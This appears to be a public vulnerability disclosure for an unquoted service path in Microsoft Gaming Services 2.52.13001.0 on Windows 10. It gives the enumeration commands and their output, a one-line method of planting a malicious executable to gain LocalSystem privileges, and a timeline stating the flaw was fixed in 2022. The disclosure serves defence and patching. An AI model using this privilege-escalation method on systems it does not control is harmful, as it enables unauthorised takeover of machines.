# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path # Discovery by: Johto Robbie # Discovery Date: May 12, 2021 # Tested Version: 2.52.13001.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 Home # Step to discover Unquoted Service Path: Go to Start and type cmd. Enter the following command and press Enter: C:\Users\Bang's>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """ Gaming Services GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto Gaming Services GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto C:\Users\Bang's>sc qc "GamingServices" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GamingServices TYPE : 210 WIN32_PACKAGED_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Gaming Services DEPENDENCIES : staterepository SERVICE_START_NAME : LocalSystem This application have no quote . And it contained in C:\Program Files. Put mot malicious aplication with name "progarm.exe" Stop & Start: GamingServices. "progarm.exe" will be execute #Exploit: An unquoted service path in Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to privilege escalation during the installation process that is performed when an executable file is registered. This could further lead to complete compromise of confidentiality, Integrity and Availability. #Timeline May 12, 2021 - Reported to Microsoft Feb 11, 2022 - Confirmed vulnerability has been fixed